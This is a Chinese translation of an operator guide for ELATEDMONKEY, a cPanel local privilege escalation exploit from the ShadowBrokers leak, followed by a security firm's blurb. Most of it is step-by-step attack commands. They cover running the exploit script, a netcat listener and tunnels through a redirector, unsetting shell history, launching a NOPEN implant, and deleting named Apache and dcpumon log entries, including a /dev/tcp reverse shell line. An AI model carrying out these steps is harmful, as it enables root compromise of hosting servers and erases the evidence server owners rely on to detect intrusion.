注:ShadowBrokers,是一个黑客组织,成立于2016年夏天。ELATEDMONKEY 是cPanel的本地提权漏洞。
翻译:极限帽儿
elatedmonkey是针对运行的cPanel远程管理的Web界面系统的本地提权攻击,已经通杀24个版本。在cPanel 11.23.3和11.24.4运行CentOS Linux 5.2已经明确的测试成功。
第一步:以普通用户身份登录,然后在shell中运行脚本。
第二步:分析你权限以及填写的输入框的类型。
pwd
-cd WORKING_DIR
date; date -u; id
uname –a
如果你是nobody用户,ELATEDMONKEY就可以直接起作用了,如果你是一个普通用户,ELATEDMONKEY只能以nobody身份执行Apache执行脚本
第三步:检查这漏洞是否可用
#或许应该添加一步来检查确保以nobody身份执行Apache执行脚本,但这将需要开发人员参与,作者没写完先占个位置
第四步:上传脚本文件和检查其内容
-put PATH_TO_ELATEDMONKEY_EXECUTABLE e.sh
-lt e.sh
为了使清消除痕迹更容易些,在你执行漏洞之前设置timestamp;
在目标机器上打开至少两个窗口,一个执行漏洞攻击,另一个设置连接隧道
在第二个窗口中输入:
-tunnel
r RHP1
在重定向窗口:
-nrtun RHP2
在攻击机器脚本窗口中输入:
nc -v -l -p RHP1
在你的攻击窗口:
-shell
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
date; date -u
sh e.sh -s 127.0.0.1 RHP1 ; date
检查端口隧道的连接和nc上面建立的连接
检查你是否是root权限
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
date; date -u
pwd
cd WORKING_DIR ; pwd
由于NOPEN限制,我们需要确保我们所有的文件描述符是封闭的,所以这是怎么做的。下面的线条被设计为复制和粘贴,但最好是减少干扰:
MY_PID=`echo -n $$` ls -lart /proc/$MY_PID/fd/
一旦你得到一个pid列表,除了0 、1 、2的其他都关闭。
exec 4>&- 5>&- 6>&- 7>&- 8>&-9>&- 10>&- 11>&-
当你运行nopen,关闭剩余的文件描述符。
PATH=. D=-cREDIRECTOR_IP:REDIRECTOR_PORT NOPEN_ON_TARGET 0>&-1>&- 2>&-
清除日志
/usr/local/apache/logs/suexec_log
[2009-01-09 05:54:15]: uid: (mailman/mailman) gid: (mailman/mailman)cmd: config_list
/usr/local/apache/logs/access_log
127.0.0.1 – – [09/Jan/2009:05:52:32 -0500] “GET /~USER/info.phpHTTP/1.0” 200 80
/usr/local/apache/logs/error_log
attribute “os”ignored
also errors fromcommands you run
/var/log/dcpumon/toplog.*
/var/log/dcpumon/<YEAR>/<MONTH>/<DAY>
Dcpumon logs processlists and system usage in the every 5 minutes. Any
commands executed on thesystem could end up in these logs. Remove any
references to commandssuch as ‘e.sh’,
‘/bin/sh -c /bin/sh >/dev/tcp/1.1.1.1/80 >&0 2>&0’, and
‘/usr/local/apache/bin/suexec mailman mailman config_list -c -i/dev/shm/mem mailman’
END
深圳市极限网络科技有限公司(简称“极限网络”)成立于2009年4月,是一家专注智能机器人与安全系统集成的专业网络安全公司,成立至今为我国关键信息基础设施、重要政府部门、大型企事业单位及重点行业提供了全面、专业的网络安全解决方案。
标签: cPanel, elatedmonkey, ShadowBrokers, 极限网络